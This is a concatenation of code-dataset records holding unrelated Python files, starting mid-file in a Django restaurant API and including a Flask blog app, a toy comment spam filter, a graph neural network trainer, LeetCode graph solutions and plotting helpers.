element.location_detail),\n 'food' : element.food.category,\n 'image' : element.restaurant_image_set.filter(restaurant_id = element.id)[0].images,\n 'grade' : element.review_set.filter(restaurant_id = element.id).values('review_star__star').aggregate(avg=Avg('review_star__star'))['avg']\n } for element in restaurants]\n return JsonResponse({\"restaurant_list\" : restaurant_list}, status=200)\n else:\n return JsonResponse({\"message\":\"VALUE_DOES_NOT_EXIST\"}, status = 400)\n\nclass RestaurantEatDealDetail(View):\n def get(self, request, eat_deal_id):\n try:\n eat_deal_detail = Eat_Deal.objects.select_related('restaurant').get(id = eat_deal_id)\n date = eat_deal_detail.end_date - eat_deal_detail.start_date\n eat_deal_data = {\n 'eat_deal_id' : eat_deal_detail.id,\n 'image' : list(eat_deal_detail.restaurant.restaurant_image_set.values('images'))[0],\n 'title' : eat_deal_detail.restaurant.name,\n 'menu' : eat_deal_detail.menu,\n 'menu_info' : eat_deal_detail.menu_info,\n 'restaurant_id' : eat_deal_detail.restaurant.id,\n 'restaurant_info' : eat_deal_detail.restaurant_intro,\n 'start_date' : str(eat_deal_detail.start_date.year) + '-' + \n str(eat_deal_detail.start_date.month) + '-' + \n str(eat_deal_detail.start_date.day),\n 'end_date' : str(eat_deal_detail.end_date.year) + '-' + \n str(eat_deal_detail.end_date.month) + '-' + \n str(eat_deal_detail.end_date.day),\n 'price' : int(eat_deal_detail.price),\n 'discount_rate' : eat_deal_detail.discount_rate,\n 'discounted_price' : int(eat_deal_detail.price) - (int(eat_deal_detail.price) * int(eat_deal_detail.discount_rate)/100),\n 'remaining_date' : date.days\n }\n return 
JsonResponse({'result' : eat_deal_data}, status = 200)\n except Eat_Deal.DoesNotExist:\n return JsonResponse({'result' :'DOES_NOT_EXIST_EAT_DEAL'}, status=404)\n\nclass RestaurantEatDealLocationCategoryView(View):\n def get(self, request):\n try:\n city = request.GET.get('city', 13)\n location_states = Location_city.objects.prefetch_related('location_state_set').get(id = city)\n\n states = [\n {\n 'id' : state['id'],\n 'state' : state['state']\n }\n for state in list(location_states.location_state_set.values())]\n\n return JsonResponse({'result' : states}, status = 200)\n \n except Location_city.DoesNotExist:\n return JsonResponse({'result' : 'DOES_NOT_EXIST_EAT_DEAL_LOCATION'}, status=404)\n\nclass ToplistView(View):\n def get(self, request):\n offset = int(request.GET.get('offset', 0))\n limit = int(request.GET.get('limit', 20))\n\n toplists = Top_List.objects.order_by('-create_at')[offset * limit : (offset+1) * limit]\n \n toplist = [{\n \"id\" : element.id,\n \"image\" : element.image,\n \"title\" : element.title,\n \"description\" : element.description\n } for element in toplists]\n return JsonResponse({\"toplists\": toplist, \"offset\" : offset+1}, status = 200)\n\n\nclass ToplistDetailView(View):\n def get(self, request, toplist_id):\n offset = int(request.GET.get('offset', 0))\n limit = int(request.GET.get('limit', 20))\n\n top_restaurants = Top_lists_Restaurant.objects.select_related('top_list', 'restaurant').filter(top_list_id = toplist_id)[ offset * limit : (offset+1) * limit]\n \n if top_restaurants.exists():\n toplist = {\n \"id\" : toplist_id,\n \"title\" : top_restaurants[0].top_list.title,\n \"description\" : top_restaurants[0].top_list.description,\n \"created_at\" : top_restaurants[0].top_list.create_at.strftime('%Y-%m-%d')\n }\n restaurants = [{\n \"id\" : element.restaurant.id,\n \"name\" : element.restaurant.name,\n \"address\" : '{} {} {} {}'.format(element.restaurant.location_city.city, element.restaurant.location_state.state, element.restaurant.location_road.road, element.restaurant.location_detail),\n \"image\" : element.restaurant.restaurant_image_set.filter(restaurant_id=element.restaurant_id)[0].images,\n \"user_image\" : 'https://s3-ap-northeast-2.amazonaws.com/mp-seoul-image-production/873410_1562147913864', \n \"user_nickname\" : element.restaurant.review_set.filter(restaurant_id=element.restaurant_id)[0].user.nick_name,\n \"user_review\" : element.restaurant.review_set.filter(restaurant_id=element.restaurant_id)[0].content\n } for element in top_restaurants]\n\n return JsonResponse({\"toplist\": toplist, \"restaurants\": restaurants, \"offset\":offset+1}, status = 200)\n else:\n return HttpResponse(status = 404)\n\nclass RestaurantDetailEatDealView(View):\n def get(self, request, restaurant_id):\n \n restaurant = Restaurant.objects.prefetch_related('eat_deal_set','restaurant_image_set').get(id = restaurant_id)\n \n restaurant_eat_deal = [\n {\n 'eat_deal_id' : eat_deal['id'],\n 'menu' : eat_deal['menu'],\n 'image' : list(restaurant.restaurant_image_set.values('images'))[0],\n 'price' : int(eat_deal['price']),\n 'discount_rate' : eat_deal['discount_rate'],\n 'discounted_price' : int(eat_deal['price']) - (int(eat_deal['price']) * int(eat_deal['discount_rate'])/100)\n }\n for eat_deal in list(restaurant.eat_deal_set.values())]\n\n return JsonResponse({'result' : restaurant_eat_deal}, status = 
200)","repo_name":"nameunji/project_wegoplate_backend","sub_path":"restaurant/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":19285,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"9848761089","text":"\r\nclass Comment:\r\n def __init__(self,data,type = 'normal'):\r\n self.type = type\r\n self.string = data\r\n\r\n ranks = {}\r\n categories = []\r\n def rank(self,rule):\r\n words = self.string.split(\" \")\r\n\r\n for word in words:\r\n\r\n if word in rule.words:\r\n\r\n if self.ranks.get(rule.type) is None:\r\n self.ranks[rule.type] = 1\r\n else:\r\n self.ranks[rule.type] += 1\r\n\r\n if self.ranks[rule.type] >= rule.minWords and rule.type not in self.categories:\r\n self.categories.append(rule.type)\r\n\r\n\r\nclass Rule:\r\n def __init__(self,words,type = 'spam',minWords = 1):\r\n print(self,words,type)\r\n self.type = type\r\n self.words = words\r\n self.minWords = minWords\r\n\r\nclass Filter:\r\n def __init__(self,rules,name = 'normal'):\r\n self.name = name\r\n self.rules = rules\r\n def filter(self,comments):\r\n toRemove = []\r\n for comment in comments:\r\n for rule in self.rules:\r\n comment.rank(rule)\r\n if len(comment.categories):\r\n toRemove.append(comment)\r\n\r\n for comment in toRemove:\r\n comments.remove(comment)\r\n return comments,toRemove\r\n\r\nrule1 = Rule(['boobs','ass'],'porn')\r\nrule2 = Rule(['win','iphone'],'spam')\r\n\r\nrules = [rule1,rule2]\r\n\r\ncomments = [Comment('I love egypt'),Comment('I love ass'),Comment('win 2 Phone'), Comment('win iphone')]\r\nfilter = Filter(rules,'spam and porn')\r\nprint([comment.string for comment in filter.filter(comments)[0]])\r\n","repo_name":"oknashar/interview-preparation","sub_path":"amazonPY/On-site/comment-Filter-System.py","file_name":"comment-Filter-System.py","file_ext":"py","file_size_in_byte":1606,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"610763135","text":"# -*- coding: utf-8 -*-\nfrom flask import Flask, render_template, request, flash, session, redirect, url_for, jsonify\nfrom models import db, Articulos, User, Categorias, Tag, tags\nfrom os import getenv\nfrom werkzeug.security import check_password_hash\nfrom werkzeug import secure_filename\nfrom time import time\nfrom math import ceil\n\n\n# Iniciar\napp = Flask(__name__)\n\n# Config\napp.config['DEBUG'] = True\n\n# Database\napp.config['SQLALCHEMY_DATABASE_URI'] = getenv('DATABASE_URL')\napp.config['SECRET_KEY'] = getenv('SECRET_KEY')\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\napp.config['MAX_CONTENT_LENGTH'] = 1 * 1024 * 1024\napp.config['ALLOWED_EXTENSIONS'] = set(['jpg', 'png'])\ndb.init_app(app)\n\n@app.route(\"/\")\ndef blog_all():\n mis_articulos = Articulos.query.order_by(Articulos.id.desc()).all()\n # Calculamos el numero maximo de paginas del paginador\n max_pags = ceil(len(mis_articulos) / 5)\n return render_template(\n 'web/blog/all.html',\n articulos=mis_articulos,\n max_pags=max_pags\n ) \n\n@app.route(\"/articulo//\")\ndef blog_articulo(id):\n # Para coger el articulo por su id\n mi_articulo = Articulos.query.get(id)\n # Select from User where id = mi_articulo.user_id\n mi_autor = User.query.get(mi_articulo.user_id)\n mi_categoria = Categorias.query.get(mi_articulo.categoria_id)\n return render_template(\n 'web/blog/articulo.html',\n articulo=mi_articulo,\n autor=mi_autor.username,\n categoria=mi_categoria.name\n )\n\n@app.route(\"/admin/login/\", methods=['GET', 'POST'])\ndef 
admin_login():\n if request.method=='POST':\n my_user = User.query.filter_by(email=request.form['email']).first()\n if my_user and check_password_hash(my_user.password, request.form['password']):\n flash('Bienvenido', 'info')\n session['id'] = my_user.id\n return redirect(url_for('admin_articulos'))\n else:\n flash('Tu email o la contraseña no es correcto', 'danger')\n return render_template('web/admin/login.html')\n\n@app.route(\"/admin/articulos/\")\ndef admin_articulos():\n if 'id' not in session:\n flash('No tienes acceso', 'danger')\n return redirect(url_for('blog_all'))\n # Obtenems todos los articulos\n articulos = Articulos.query.order_by(Articulos.id.desc()).all()\n return render_template('web/admin/articulos.html', articulos=articulos)\n\n@app.route(\"/admin/articulos/nuevo\", methods=['GET', 'POST'])\ndef admin_nuevo_articulo():\n # Comprobamos si tiene sesion\n if 'id' not in session:\n flash('No tienes acceso', 'danger')\n return redirect(url_for('blog_all'))\n # Guardamos datos del formulario\n if request.method == 'POST':\n titulo = request.form['titulo']\n contenido = request.form['contenido']\n categoria = request.form['categoria']\n mis_tags = request.form.getlist('tags')\n usuario= session['id']\n # Guaardar en la base de datos\n nuevo_articulo = Articulos()\n nuevo_articulo.title = titulo\n nuevo_articulo.text = contenido\n nuevo_articulo.categoria_id = categoria\n nuevo_articulo.user_id = usuario\n for tag in mis_tags:\n mi_temp_tag = Tag.query.get(tag)\n nuevo_articulo.tags.append(mi_temp_tag)\n # Guardamos imagen\n try:\n f = request.files['portada']\n nombre = str(int(time())) + f.filename\n f.save('static/uploads/' + secure_filename(nombre))\n nuevo_articulo.portada = nombre\n except:\n flash('No se ha subido la imagen de portada', 'danger')\n db.session.add(nuevo_articulo)\n db.session.commit()\n # Mostramos informacion al usuario\n flash('Articulo creado', 'primary')\n # Obtenems todos las categorias\n categorias = Categorias.query.all()\n # Obtenemos los tags\n tags=Tag.query.all()\n return render_template('web/admin/nuevo_articulo.html', \n categorias=categorias,\n tags=tags\n )\n\n@app.route(\"/admin/categorias/\")\ndef admin_categorias():\n if 'id' not in session:\n flash('No tienes acceso', 'danger')\n return redirect(url_for('blog_all'))\n # Obtenems todos los articulos\n categorias = Categorias.query.all()\n return render_template('web/admin/categorias.html', categorias=categorias)\n\n@app.route(\"/admin/categorias/nueva\", methods=['GET', 'POST'])\ndef admin_nueva_categoria():\n if 'id' not in session:\n flash('No tienes acceso', 'danger')\n return redirect(url_for('blog_all'))\n if request.method == 'POST':\n categoria = request.form['nombre']\n # Guardamos la categoria en la base de datos\n nueva_categoria = Categorias()\n nueva_categoria.name = categoria\n db.session.add(nueva_categoria)\n db.session.commit()\n # Mostramos informacion al usuario\n flash('Categoria creada', 'primary')\n return redirect(url_for(\"admin_categorias\"))\n # Obtenems todos los articulos\n categorias = Categorias.query.all()\n return render_template('web/admin/nueva_categoria.html', categorias=categorias)\n\n@app.route('/articulo/borrar', methods=['POST'])\ndef borrar_articulo():\n if request.method == 'POST':\n articulo_id_borrar = request.form['articulo-borrar']\n # Borramos de la base de datos\n Articulos.query.filter_by(id=articulo_id_borrar).delete()\n db.session.commit()\n flash('Articulo borrado correctamente', 'success')\n return 
redirect(url_for('admin_articulos'))\n\n@app.route('/articulo/actualizar/', methods=['GET', 'POST'])\ndef editar_articulo(id):\n # Protegemos nuestra pagina\n if 'id' not in session:\n flash('No tienes acceso', 'danger')\n return redirect(url_for('blog_all'))\n # Consultamos la base de datos\n mi_articulo = Articulos.query.get(id)\n if request.method == 'POST':\n titulo = request.form['titulo']\n contenido = request.form['contenido']\n categoria = request.form['categoria']\n mis_tags = request.form.getlist('tags')\n usuario= session['id']\n # Guardar en la base de datos\n mi_articulo.title = titulo\n mi_articulo.text = contenido\n mi_articulo.categoria_id = categoria\n mi_articulo.user_id = usuario\n for tag in mis_tags:\n mi_temp_tag = Tag.query.get(tag)\n mi_articulo.tags.append(mi_temp_tag)\n # Guardamos imagen\n try:\n f = request.files['portada']\n if f.filename:\n nombre = str(int(time())) + f.filename\n f.save('static/uploads/' + secure_filename(nombre))\n mi_articulo.portada = nombre\n except:\n flash('No se ha subido la imagen de portada', 'danger')\n db.session.add(mi_articulo)\n db.session.commit()\n # Mostramos informacion al usuario\n flash('Articulo actualizado', 'primary')\n # Obtenemos todas las categorias\n categorias = Categorias.query.all()\n # Obtenemos los tags\n tags=Tag.query.all()\n return render_template('web/admin/editar_articulo.html', \n categorias=categorias,\n tags=tags,\n articulo=mi_articulo\n )\n\n@app.route('/categoria/borrar', methods=['POST'])\ndef borrar_categoria():\n if request.method == 'POST':\n # Obtenemos la id\n categoria_id_borrar = request.form['categoria-borrar']\n # Borramos de la base de datos\n Categorias.query.filter_by(id=categoria_id_borrar).delete()\n db.session.commit()\n # Marcamos la categoria por defecto para los articulos\n articulos = Articulos.query.filter_by(categoria_id=categoria_id_borrar).all()\n for articulo in articulos:\n articulo.categoria = Categorias.query.first()\n db.session.add(articulo)\n # Informamos al usuario\n flash('Categoría borrada correctamente', 'success')\n return redirect(url_for('admin_categorias'))\n\n@app.route('/categoria/editar/', methods=['GET', 'POST'])\ndef editar_categoria(id):\n # Consultamos la base de datos\n mi_categoria = Categorias.query.get(id)\n # Actualizar\n if request.method == 'POST':\n nombre = request.form['nombre']\n mi_categoria.name = nombre\n db.session.add(mi_categoria)\n db.session.commit()\n flash('Categoria actualizada', 'success')\n return redirect(url_for('admin_categorias'))\n # Renderizamos\n return render_template(\n 'web/admin/editar_categoria.html',\n categoria = mi_categoria\n )\n\n@app.route(\"/admin/tags/\")\ndef admin_tags():\n if 'id' not in session:\n flash('No tienes acceso', 'danger')\n return redirect(url_for('blog_all'))\n # Obtenemos todos los tags\n tags = Tag.query.all()\n return render_template('web/admin/tags.html', tags=tags)\n\n@app.route(\"/admin/tags/nueva\", methods=['GET', 'POST'])\ndef admin_nuevo_tag():\n if 'id' not in session:\n flash('No tienes acceso', 'danger')\n return redirect(url_for('blog_all'))\n if request.method == 'POST':\n tag = request.form['nombre']\n # Guardamos el tag en la base de datos\n nuevo_tag = Tag()\n nuevo_tag.name = tag\n db.session.add(nuevo_tag)\n db.session.commit()\n # Mostramos informacion al usuario\n flash('Tag creado', 'primary')\n return redirect(url_for(\"admin_tags\"))\n # Obtenemos todos los tags\n tags = Tag.query.all()\n return render_template('web/admin/nuevo_tag.html', 
tags=tags)\n\n@app.route('/tags/borrar', methods=['POST'])\ndef borrar_tag():\n if request.method == 'POST':\n tag_id_borrar = request.form['tag-borrar']\n # Borramos de la base de datos\n Tag.query.filter_by(id=tag_id_borrar).delete()\n db.session.commit()\n flash('Tag borrada correctamente', 'success')\n return redirect(url_for('admin_categorias'))\n\n@app.route('/tags/editar/', methods=['GET', 'POST'])\ndef editar_tag(id):\n # Consultamos la base de datos\n mi_tag = Tag.query.get(id)\n # Actualizar\n if request.method == 'POST':\n nombre = request.form['nombre']\n mi_tag.name = nombre\n db.session.add(mi_tag)\n db.session.commit()\n flash('Tag actualizado', 'success')\n return redirect(url_for('admin_tags'))\n return render_template(\n 'web/admin/editar_tag.html',\n tag=mi_tag\n )\n\n@app.route('/logout')\ndef logout():\n session.pop('id', None)\n flash('Has cerrado tu sesión correctamente', 'success')\n return redirect(url_for('blog_all'))\n\n@app.route('/buscar')\ndef buscar():\n if request.args.get('q'):\n q = request.args.get('q')\n mis_resultados = Articulos.query.filter(Articulos.title.ilike(f'%{q}%')).all()\n return render_template(\n 'web/blog/busqueda.html',\n resultados=mis_resultados,\n num_resultados=len(mis_resultados),\n busqueda=q\n )\n else:\n return redirect(url_for('blog_all'))\n\n@app.route('/api/articulos/')\ndef api_articulos(pag):\n num_articulos_max = 5\n mis_articulos = Articulos.query.offset((pag-1)*num_articulos_max).limit(num_articulos_max).all() \n # Convertimos un resultado de models a un Json\n dict_resultados = dict()\n for articulo in mis_articulos:\n portada = ''\n if articulo.portada:\n portada = url_for('static', filename='uploads/' + articulo.portada)\n dict_resultados[articulo.id]= {\n 'id': articulo.id,\n 'portada': portada,\n 'title': articulo.title,\n 'text': articulo.text[1:100]\n }\n return jsonify(dict_resultados)\n\n\nif __name__ == \"__main__\":\n app.run()","repo_name":"leyorgar/blog","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":11737,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25631510262","text":"listF = {}\r\nlistG = {}\r\n\r\ninlength = int(input('Length: '))\r\n\r\nfor p in range(3, inlength+1, 2):\r\n length = p\r\n track = length\r\n list1 = []\r\n count = 0\r\n while (length != 1):\r\n if (length % 2) == 0:\r\n length = length // 2\r\n if (length < p) and (p not in listG):\r\n listG[p] = count\r\n count += 1\r\n else:\r\n length = (3 * length) + 1\r\n if (length < p) and (p not in listG):\r\n listG[p] = count\r\n count += 1\r\n if(length == 1):\r\n track = track + 1\r\n length = track\r\n break\r\n list1.append(length)\r\n listF[p] = max(list1)\r\n\r\n# print(\"Maximum value of sequence:\")\r\n# print(listF)\r\n\r\n# print(\"Values of sequence:\")\r\n# print(listF.values())\r\n\r\ninverted_dict = {}\r\n\r\n# Iterate over the original dictionary\r\nfor key, value in listG.items():\r\n # Check if the value is already a key in the inverted dictionary\r\n if value in inverted_dict:\r\n # If the value is already a key, append the current key to the list of keys for that value\r\n inverted_dict[value].append(key)\r\n else:\r\n # If the value is not already a key, create a new list with the current key and add it to the dictionary\r\n inverted_dict[value] = [key]\r\n\r\n# Sort the dictionary by the keys in ascending order\r\nsorted_dict = {k: sorted(v) for k, v in sorted(inverted_dict.items())}\r\n\r\n\r\n# for general testing\r\n# 
print(\"Steps to go below original value:\")\r\n# print(sorted_dict)\r\n\r\n# for big nums reasearch\r\nwith open(\"output.txt\", \"w\") as f:\r\n f.write(\"Steps to go below original value:\\n\")\r\n # Write the sorted dictionary to the file\r\n for key, value in sorted_dict.items():\r\n f.write(f\"{key}: {value}\\n\")\r\n","repo_name":"8-BitCode/3x1","sub_path":"colly.py","file_name":"colly.py","file_ext":"py","file_size_in_byte":1778,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33760399845","text":"from google.appengine.api import memcache\nimport time\nimport logging\n\n\ndef current_rate(entity, limit, duration):\n \"\"\"\n Stores a counter with the given name. This function reports rate limit\n denials based on the given limit.\n\n >>> current_rate('rlt_test', 2, 60)\n 1L\n >>> current_rate('rlt_test', 2, 60)\n 2L\n >>> current_rate('rlt_test', 2, 60)\n 3L\n \"\"\"\n\n key = \"ratelimit:{}:{}\".format(int(time.time() / duration), entity)\n value = memcache.incr(key, initial_value=0)\n if value > limit:\n logging.info(\n \"RateLimitDenied({!r}, value={!r}, limit={!r}, duration={!r})\"\n .format(entity, value, limit, duration))\n else:\n logging.info(\n \"RateLimitAllowed({!r}, value={!r}, limit={!r}, duration={!r})\"\n .format(entity, value, limit, duration))\n return value\n\n\ndef rate_limit(entity, limit, duration=60):\n \"\"\"\n Runs a rate limit with the given duration.\n\n >>> rate_limit('rlt_test2', 2)\n False\n >>> rate_limit('rlt_test2', 2)\n False\n >>> rate_limit('rlt_test2', 2)\n True\n \"\"\"\n\n return current_rate(entity, limit, duration) > limit\n","repo_name":"uchicago-sg/caravel","sub_path":"caravel/storage/dos.py","file_name":"dos.py","file_ext":"py","file_size_in_byte":1158,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"53"} +{"seq_id":"6342531804","text":"import os\nimport sys\nsys.path.insert(0, os.path.abspath('../'))\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport dgl\n\nfrom conv import FALayer\nfrom data import DataLoader, DataProcessor\nfrom utils import seed_everything, get_config, init_params, expRun, RunTimes\n\nimport matplotlib.pyplot as plt\nimport random\n\n\nclass FAGCN(nn.Module):\n def __init__(self, g, eps, num_features, num_classes, hidden_dim, num_layer, dprate, dropout):\n super(FAGCN, self).__init__()\n self.g = g\n self.eps = eps\n self.layer_num = num_layer\n self.dropout = dropout\n self.dprate = dprate\n\n self.feat_encoder = nn.Linear(num_features, hidden_dim)\n self.final_encoder = nn.Linear(hidden_dim, num_classes)\n\n self.layers = nn.ModuleList(\n [FALayer(self.g, hidden_dim, dprate) for i in range(num_layer)])\n \n def forward(self, x):\n x = F.dropout(x, p=self.dropout, training=self.training)\n x = torch.relu(self.feat_encoder(x))\n x = F.dropout(x, p=self.dropout, training=self.training)\n raw = x\n \n for i in range(self.layer_num):\n x = self.layers[i](x)\n x = self.eps * raw + x\n x = self.final_encoder(x)\n\n return x\n \n \n\ndef RunOnce(seed, data, config, device):\n\n seed_everything(seed)\n\n # process data: get laplacian, eigenvalues, eigenvectors, train/validate/test mask\n data_process_config = config.data_process\n model_config = config.model\n train_config = config.train\n\n g = data.g\n data = DataProcessor(data, config.train_rate, config.val_rate, data_process_config)\n data = data.to(device)\n\n\n # init model\n model = FAGCN(g, model_config.eps, data.num_features, 
data.num_classes,\n model_config.hidden_dim, model_config.num_layer, train_config.dprate, train_config.dropout).to(device)\n model.apply(init_params)\n\n optimizer = torch.optim.Adam(\n model.parameters(), lr=train_config.lr, weight_decay=train_config.weight_decay)\n\n val_acc, test_acc, time_run = expRun(model, optimizer, data, train_config.epochs, train_config.early_stopping)\n\n \n return val_acc, test_acc, time_run\n\n\nconfig = get_config(\"FAGCN\")\ndevice = torch.device('cuda:'+str(config.device)\n if torch.cuda.is_available() else 'cpu')\n\n# load data\ndata = DataLoader(config.dataset)\nU = data.edge_index[0]\nV = data.edge_index[1]\ng = dgl.graph((U, V))\ng = dgl.to_simple(g)\ng = dgl.remove_self_loop(g)\ng = dgl.to_bidirected(g)\n\ng = g.to(device)\ndeg = g.in_degrees().float().to(device)\nnorm = torch.pow(deg, -0.5)\nnorm[torch.isinf(norm)] = 0.\n\ng.ndata['d'] = norm\n\ndata.g = g\n\n\nSEEDS=[0, 1, 2, 3, 4, 5, 6, 7, 8, 9]\n\n# RunOnce(1, data, config, device)\nRunTimes(SEEDS, RunOnce, data, config, device)","repo_name":"liuyang-tian/Spectral-GNN-Library","sub_path":"examples/fagcn_trainer.py","file_name":"fagcn_trainer.py","file_ext":"py","file_size_in_byte":2812,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"1987314095","text":"from tkinter import *\n\nroot = Tk()\nroot.title(\"Tarea POO\")\n\nLabel(root, text= \"Ingrese sus datos\", bg= \"purple2\", fg= \"white\").grid(row=0, column=0,columnspan=18, sticky= W+E+N+S)\n\n\nLabel(root, text=\"Título\").grid(row=1, column=0, sticky= W)\nLabel(root, text=\"Ruta\").grid(row=2, column=0, sticky= W)\nLabel(root, text=\"Descripción\").grid(row=3, column=0, sticky= W)\ne1 = Entry(root)\ne2 = Entry(root)\ne3 = Entry(root)\ne1.grid(row=1, column=1)\ne2.grid(row=2, column=1)\ne3.grid(row=3, column=1)\n\n\na = Button(root, text=\"Alta\", fg= \"black\"). grid( row=4, column=1, padx=5,pady=2, sticky= N)\nb = Button(root, text=\"Sorpresa\", fg= \"black\"). 
grid( row=4, column=8, padx=45,pady=2, sticky= SE)\n\n\n\nmainloop() \n\n","repo_name":"Bluemavim/Python3Inicial","sub_path":"Ejercicio 1 U3.py","file_name":"Ejercicio 1 U3.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20852278719","text":"words = []\nflag = []\nres = False\nT = int(input())\nwhile(T>0):\n n = int(input())\n for i in range(n):\n words.append(input())\n if(len(words)==1):\n res = False\n else:\n for i in range(n):\n if((i==0) and (words[i][-1]==words[i+1][0])):\n flag.append(\"true\")\n if(i==(n-1) and (words[i][0]==words[i-1][-1])):\n flag.append(\"true\")\n elif((i!=0) and (i!=(n-1))):\n if((words[i][0]==words[i-1][-1]) and (words[i][-1]==words[i+1][0])):\n flag.append(\"true\")\n else:\n flag.append(\"false\")\n for word in flag:\n if(word==\"true\"):\n res = True\n else:\n res = False\n if(res):\n print(\"Ordering is possible.\")\n else:\n print(\"The door cannot be opened.\")\n T = T - 1\n words = []\n flag = []\n \n \n","repo_name":"shiv6146/SPOJ","sub_path":"WORDS1.py","file_name":"WORDS1.py","file_ext":"py","file_size_in_byte":907,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17356031966","text":"# coding: utf-8\n\"\"\"\nTests utilities\n\"\"\"\nimport unittest\n\nfrom maggma.utils import recursive_update, Timeout\nfrom time import sleep\n\nclass UtilsTests(unittest.TestCase):\n\n def test_recursiveupdate(self):\n d = {\"a\": {\"b\": 3}, \"c\": [4]}\n\n recursive_update(d, {\"c\": [5]})\n self.assertEqual(d[\"c\"], [5])\n\n recursive_update(d, {\"a\": {\"b\": 5}})\n self.assertEqual(d[\"a\"][\"b\"], 5)\n\n recursive_update(d, {\"a\": {\"b\": [6]}})\n self.assertEqual(d[\"a\"][\"b\"], [6])\n\n recursive_update(d, {\"a\": {\"b\": [7]}})\n self.assertEqual(d[\"a\"][\"b\"], [7])\n\n def test_timeout(self):\n\n def takes_too_long():\n with Timeout(seconds=1):\n sleep(2)\n\n self.assertRaises(TimeoutError, takes_too_long)\n","repo_name":"Kamilstepniewski/DjangoProject-Recipe_App","sub_path":"venv/Lib/site-packages/maggma/tests/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":771,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34604460366","text":"from typing import List\nfrom collections import deque\n\n\nclass Node:\n def __init__(self, val=0, neighbors=None):\n self.val = val\n self.neighbors = neighbors if neighbors is not None else []\n\n\nclass Solution:\n # https://leetcode.com/problems/clone-graph/\n def cloneGraph(self, node: Node):\n if not node:\n return\n if not node.neighbors:\n return Node(node.val)\n\n visited = {}\n\n def _do(node: Node):\n new_node = Node(node.val)\n visited[node.val] = new_node\n for x in node.neighbors:\n if x.val not in visited:\n cloned = _do(x)\n new_node.neighbors.append(cloned)\n else:\n new_node.neighbors.append(visited[x.val])\n return new_node\n\n return _do(node)\n\n # https://leetcode.com/problems/course-schedule/\n def canFinish(self, numCourses: int, prerequisites: List[List[int]]):\n in_degree = {x: 0 for x in range(numCourses)}\n graph = {x: [] for x in range(numCourses)}\n\n for v, u in prerequisites:\n graph[v].append(u)\n in_degree[u] += 1\n\n sources = deque()\n\n for k in in_degree:\n if in_degree[k] == 0:\n sources.append(k)\n\n ordered = []\n\n while sources:\n vertex = sources.popleft()\n ordered.append(vertex)\n\n for x in graph[vertex]:\n in_degree[x] 
-= 1\n if in_degree[x] == 0:\n sources.append(x)\n\n return len(ordered) == numCourses\n\n # https://leetcode.com/problems/alien-dictionary/\n def alienOrder(self, words: List[str]):\n in_degree = {}\n graph = {}\n\n for word in words:\n for ch in word:\n graph[ch] = []\n in_degree[ch] = 0\n\n for i in range(len(words) - 1):\n w1, w2 = words[i], words[i + 1]\n\n is_diff = False\n for i in range(min(len(w1), len(w2))):\n ch1, ch2 = w1[i], w2[i]\n if ch1 != ch2:\n graph[ch1].append(ch2)\n in_degree[ch2] += 1\n is_diff = True\n break\n if not is_diff and len(w1) > len(w2):\n return ''\n\n sources = deque()\n\n for k in in_degree:\n if in_degree[k] == 0:\n sources.append(k)\n\n ordered = []\n\n while sources:\n vertex = sources.popleft()\n ordered.append(vertex)\n\n for ch in graph[vertex]:\n in_degree[ch] -= 1\n if in_degree[ch] == 0:\n sources.append(ch)\n\n if len(ordered) != len(in_degree):\n return ''\n\n return ''.join(ordered)\n\n # https://leetcode.com/problems/is-graph-bipartite/\n def isBipartite(self, graph: List[List[int]]):\n grouped = {}\n\n for i in range(len(graph)):\n if i not in grouped:\n queue = []\n queue.append((i, 0))\n\n while queue:\n vert, group = queue.pop(0)\n ch_group = 1 if not group else 0\n\n for j in graph[vert]:\n if j not in grouped:\n grouped[j] = ch_group\n queue.append((j, ch_group))\n else:\n if grouped[j] == group:\n return False\n\n return True\n\n # https://leetcode.com/problems/number-of-connected-components-in-an-undirected-graph/\n def countComponents(self, n: int, edges: List[List[int]]):\n graph = {x: [] for x in range(n)}\n\n for v, u in edges:\n graph[v].append(u)\n graph[u].append(v)\n\n res = 0\n\n for i in range(n):\n queue = [i]\n\n if i in graph:\n res += 1\n\n for it in queue:\n if it in graph:\n for ch in graph[it]:\n queue.append(ch)\n del graph[it]\n\n return res\n","repo_name":"lisss/ntbts","sub_path":"algorithms/graphs.py","file_name":"graphs.py","file_ext":"py","file_size_in_byte":4171,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"27995079262","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt \nimport seaborn as sns\nfrom sklearn.cluster import cluster_optics_dbscan\n\ndef plot_missing_data(df, **kwargs):\n \"\"\"Plots a dataframe's proportion of missing values by column as a horizontal bar chart.\"\"\"\n missing_data_summary = pd.DataFrame(\n df.isna().sum() / len(df),\n columns=['missing']\n ).sort_values('missing', ascending=False)\n fig, ax = plt.subplots(**kwargs)\n sns.barplot(\n data=missing_data_summary,\n y=missing_data_summary.index,\n x='missing',\n color='red',\n orient='h',\n ax=ax\n )\n plt.title('Missing Data by Column')\n plt.xlabel('Proportion Missing')\n plt.show()\n\ndef univ_dist(x, **kwargs):\n \"\"\"Given an array, this function prints its descriptive statistics and plots its distribution.\"\"\"\n print(x.describe())\n fig, (ax1, ax2) = plt.subplots(ncols=2, **kwargs)\n sns.kdeplot(x=x, ax=ax1)\n sns.violinplot(x=x, ax=ax2)\n plt.show()\n\ndef biv_dist(X, xname, yname, 